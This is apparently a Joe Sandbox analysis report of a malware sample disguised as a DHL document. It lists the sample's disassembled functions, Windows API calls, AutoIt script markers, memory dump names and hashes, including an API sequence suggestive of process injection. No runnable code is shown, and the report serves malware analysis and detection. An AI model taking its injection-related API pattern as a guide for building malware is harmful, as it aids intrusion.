                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 2861923089-1757145024
                                                                                        • Opcode ID: bbef0b2dd34c978315f322f7d3e61be63b6c26a26c14f889275198335cc72d44
                                                                                        • Instruction ID: 12acbac19e49efa24ad06f3c9d0c71bb67da97b7bc3b77cb0475af3828d9eda7
                                                                                        • Opcode Fuzzy Hash: bbef0b2dd34c978315f322f7d3e61be63b6c26a26c14f889275198335cc72d44
                                                                                        • Instruction Fuzzy Hash: A7916E71910219AFCF18EFA4CC919EEB7B8FF04314F10452AF815AB2E1DB71AA55DB50
                                                                                        Function 00C035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C035A1,SwapMouseButtons,00000004,?), ref: 00C035D4
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C035A1,SwapMouseButtons,00000004,?,?,?,?,00C02754), ref: 00C035F5
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00C035A1,SwapMouseButtons,00000004,?,?,?,?,00C02754), ref: 00C03617
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 7317863b5259114fe2e2d795f87acca2b537ae9113d24de7d569650bf70bedfc
                                                                                        • Instruction ID: fc4272d7a44159f3fe8771cbdb4af1ff9c96a29236e0da82a298b63e2cb949f4
                                                                                        • Opcode Fuzzy Hash: 7317863b5259114fe2e2d795f87acca2b537ae9113d24de7d569650bf70bedfc
                                                                                        • Instruction Fuzzy Hash: AF113371610648BEDB208F65D880AEEBBBCEF04740F108469B905D7250E6729F41EBA8
                                                                                        Function 013EB0E0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 013EB89B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013EB931
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013EB953
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                        • Instruction ID: f784cb96e99f643370d885a0c4a1d4d1a82da7c9e95c9744c28cf6285f374916
                                                                                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                        • Instruction Fuzzy Hash: DA620A30A14268DBEB24CBA4C844BDEB776EF58304F1091A9D20DEB3D4E7759E81CB59
                                                                                        Function 00C6955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C04EE5: _fseek.LIBCMT ref: 00C04EFD
                                                                                          • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69824
                                                                                          • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69837
                                                                                        • _free.LIBCMT ref: 00C696A2
                                                                                        • _free.LIBCMT ref: 00C696A9
                                                                                        • _free.LIBCMT ref: 00C69714
                                                                                          • Part of subcall function 00C22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C29A24), ref: 00C22D69
                                                                                          • Part of subcall function 00C22D55: GetLastError.KERNEL32(00000000,?,00C29A24), ref: 00C22D7B
                                                                                        • _free.LIBCMT ref: 00C6971C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction ID: 43e8cbdb7b55e25e3a24e82c867da83673ebe983841b93c3faba12057dc79b6d
                                                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction Fuzzy Hash: B8516FB1D04219AFDF249FA4DC81A9EBBB9EF48300F10459EF209A3281DB715A90DF59
                                                                                        Function 00C2470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction ID: 30cf96b548e6791076af48d6720de26c9475bcdeaea3c3a3d9d230e78207da82
                                                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction Fuzzy Hash: 9F41A475A007659BDB1CCF69E8809AA7BA6AF45764B24813DE835C7E80DB70DE81CB40
                                                                                        Function 00C044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C044CF
                                                                                          • Part of subcall function 00C0407C: _memset.LIBCMT ref: 00C040FC
                                                                                          • Part of subcall function 00C0407C: _wcscpy.LIBCMT ref: 00C04150
                                                                                          • Part of subcall function 00C0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C04160
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00C04524
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C04533
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C3D4B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: b37dc9eef381fb134bbe361e8017caa4d2869c91c4cd91da921cf650d680247f
                                                                                        • Instruction ID: 37b33bf02b2d1327146e24c81624752feb78c86f97198a1282a369fd71cb2885
                                                                                        • Opcode Fuzzy Hash: b37dc9eef381fb134bbe361e8017caa4d2869c91c4cd91da921cf650d680247f
                                                                                        • Instruction Fuzzy Hash: 2C21C5B1904794AFE7328B24DC55BEBBBECAB05318F0400DDE79A56181C3742A84DB51
                                                                                        Function 00C07285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C3EA39
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00C3EA83
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                          • Part of subcall function 00C20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C207B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: 5725c7296378e7c30f21e5bb7cbab83acfe9b1fbbd32fd92a02f4748cc9742aa
                                                                                        • Instruction ID: bf38a78d3297977bff321c67d9a0305f8c26c81de86f82bea46ba43945853062
                                                                                        • Opcode Fuzzy Hash: 5725c7296378e7c30f21e5bb7cbab83acfe9b1fbbd32fd92a02f4748cc9742aa
                                                                                        • Instruction Fuzzy Hash: DD21C371A10258ABCF05DF94D845BEE7BFCAF48714F00401AE408A7281DBB45989DFA1
                                                                                        Function 00C698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00C698F8
                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C6990F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: afa2eb29edf75f47a7a437493aed6eae0847061956912eaea7bbcf48a5192e03
                                                                                        • Instruction ID: 2550ef8b81461c75c7364af67c57857fc9183143dd819203d9579586b432830d
                                                                                        • Opcode Fuzzy Hash: afa2eb29edf75f47a7a437493aed6eae0847061956912eaea7bbcf48a5192e03
                                                                                        • Instruction Fuzzy Hash: 43D05E7954030DABDB509BA0DC0EFDA773CE714700F0002B1BA94D10A1EAB195998B95
                                                                                        Function 00C7CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ecc7df98fb2e932f96b263e98f307fe212c27e28176a933cb58a03dac650c56
                                                                                        • Instruction ID: 8fe43e654e26c7b81f6d109c33b377626da057547b14131e967dce774e180d9c
                                                                                        • Opcode Fuzzy Hash: 9ecc7df98fb2e932f96b263e98f307fe212c27e28176a933cb58a03dac650c56
                                                                                        • Instruction Fuzzy Hash: 4EF12A716083019FCB14DF29C484A6ABBE5FF88314F54892EF8A99B391D731E945CF82
                                                                                        Function 00C0F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C20193
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C2019B
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C201A6
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C201B1
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C201B9
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C201C1
                                                                                          • Part of subcall function 00C160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C0F930), ref: 00C16154
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C0F9CD
                                                                                        • OleInitialize.OLE32(00000000), ref: 00C0FA4A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C445C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1986988660-0
                                                                                        • Opcode ID: e0ca921cc7f3bf33fb90f7e9c340144d7a29cb6efed6c6fae82fc5e6d5e5945c
                                                                                        • Instruction ID: 1e1fbb22344d0ba7e839aab8796b6a9eb0049bcf2f45a42b68eae97dab0e42b3
                                                                                        • Opcode Fuzzy Hash: e0ca921cc7f3bf33fb90f7e9c340144d7a29cb6efed6c6fae82fc5e6d5e5945c
                                                                                        • Instruction Fuzzy Hash: CB81ACB0915A80CFC788DF29E845F1D7BE5EBA8306794822EE419CB2B1EB7064C5DF14
                                                                                        Function 00C0434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C04370
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C04415
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C04432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1505330794-0
                                                                                        • Opcode ID: d59ec8341b1bb6c3faf0f620fd97b09c2200fb1eeba6f21e98877cd38feeb6c3
                                                                                        • Instruction ID: 7031caf101f77ba55a356bbab68732c8bced6512e7242adab624558e93afad91
                                                                                        • Opcode Fuzzy Hash: d59ec8341b1bb6c3faf0f620fd97b09c2200fb1eeba6f21e98877cd38feeb6c3
                                                                                        • Instruction Fuzzy Hash: 563173B15047119FD725DF64D884B9BBBF8FB58309F00092EF69AC2291D771BA84CB52
                                                                                        Function 00C2571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00C25733
                                                                                          • Part of subcall function 00C2A16B: __NMSG_WRITE.LIBCMT ref: 00C2A192
                                                                                          • Part of subcall function 00C2A16B: __NMSG_WRITE.LIBCMT ref: 00C2A19C
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00C2573A
                                                                                          • Part of subcall function 00C2A1C8: GetModuleFileNameW.KERNEL32(00000000,00CC33BA,00000104,?,00000001,00000000), ref: 00C2A25A
                                                                                          • Part of subcall function 00C2A1C8: ___crtMessageBoxW.LIBCMT ref: 00C2A308
                                                                                          • Part of subcall function 00C2309F: ___crtCorExitProcess.LIBCMT ref: 00C230A5
                                                                                          • Part of subcall function 00C2309F: ExitProcess.KERNEL32 ref: 00C230AE
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        • RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00C20DD3,?), ref: 00C2575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: a924ee3cefb34e05a01f679890def93da170cc9b790954e806e61dc7f698d19b
                                                                                        • Instruction ID: 4f753e1eb822fb53d5136101cc85fb67c8f848279c71ee8ab212a6d193f9b725
                                                                                        • Opcode Fuzzy Hash: a924ee3cefb34e05a01f679890def93da170cc9b790954e806e61dc7f698d19b
                                                                                        • Instruction Fuzzy Hash: 97012875290B71DBDA106735FC42B2F73488F42F61F100429F415DB9D1DE748E016761
                                                                                        Function 00C698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C69548,?,?,?,?,?,00000004), ref: 00C698BB
                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C698D1
                                                                                        • CloseHandle.KERNEL32(00000000,?,00C69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C698D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: 21575ec053f26cd3de7b983b3fb0cc8c36779bcfaed72a9058b0f0368c5dd359
                                                                                        • Instruction ID: 16e48860432be8b467a126b7f39bfb1ff4ececaecfb2a7a0c3984002d6eba47d
                                                                                        • Opcode Fuzzy Hash: 21575ec053f26cd3de7b983b3fb0cc8c36779bcfaed72a9058b0f0368c5dd359
                                                                                        • Instruction Fuzzy Hash: EEE08632140214B7EB312B54EC0DFDE7B59EB0A761F104124FB24A90F087B11622979C
                                                                                        Function 00C0A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CALL
                                                                                        • API String ID: 0-4196123274
                                                                                        • Opcode ID: 730c4ee3d96c69c2ac33743e30a0f7f306b5e3e2fd7aea5547cc554a0f6b14d6
                                                                                        • Instruction ID: a00cd33ef74ce2fd1417ad98b9f8a4f9ff588fbe19cefcd84277e6add7a74bbe
                                                                                        • Opcode Fuzzy Hash: 730c4ee3d96c69c2ac33743e30a0f7f306b5e3e2fd7aea5547cc554a0f6b14d6
                                                                                        • Instruction Fuzzy Hash: 5B223774608301DFDB24DF14C494B6ABBE1BF84304F15896DE99A8B3A2D731ED85DB82
                                                                                        Function 00C04C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 4104443479-3962188686
                                                                                        • Opcode ID: 1077aa9362e8a6f3486e6aafb09c99e0d7cc5dce69f0253612f99591087743b3
                                                                                        • Instruction ID: 0037c28f749689e43c454b456b7c6ef93e417ad2ca87bbf51627f7a827ac7a35
                                                                                        • Opcode Fuzzy Hash: 1077aa9362e8a6f3486e6aafb09c99e0d7cc5dce69f0253612f99591087743b3
                                                                                        • Instruction Fuzzy Hash: D7417AF1A043586BDF299B64D8617BF7FA69B55300F284075EF829B2C2D6309E44D3A1
